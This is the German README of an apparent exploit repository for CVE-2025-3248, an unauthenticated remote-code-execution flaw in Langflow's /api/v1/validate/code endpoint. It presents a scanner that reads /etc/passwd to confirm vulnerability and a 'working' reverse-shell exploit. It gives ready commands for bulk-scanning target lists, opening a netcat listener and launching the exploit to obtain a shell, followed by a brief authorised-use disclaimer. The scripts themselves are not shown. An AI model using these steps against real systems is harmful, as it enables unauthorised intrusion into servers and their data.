
Scanner und Exploit für CVE-2025-3248, eine nicht authentifizierte RCE in Langflow AI. Enthält einen Schwachstellenprüfer und einen Reverse-Shell-Payload-Generator für autorisierte Sicherheitstests.
Dieses Repository enthält zwei Python-Skripte:
LangflowCheck.py: Ein Scanner, der nach Langflow-AI-Instanzen sucht, die anfällig für CVE-2025-3248 sind.exploit.py: Ein funktionierender Reverse-Shell-Exploit für verwundbare Langflow-Ziele.CVE-2025-3248 ist eine kritische Schwachstelle in Langflow AI, die es nicht authentifizierten Angreifern ermöglicht, über eine präparierte Nutzlast an /api/v1/validate/code beliebigen Python-Code remote auszuführen.
LangflowCheck.py/etc/passwd ausliest.exploit.pylhost) und Listener-Port (lport).exploit.log.pip install -r requirements.txt
Einzel-URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Mehrere Ziele
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

Zuerst einen Listener starten
sudo nc -nvlp 4444

Dann den Exploit ausführen:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Sie sollten eine Shell erhalten, wenn das Ziel verwundbar ist.

Dieser Exploit dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.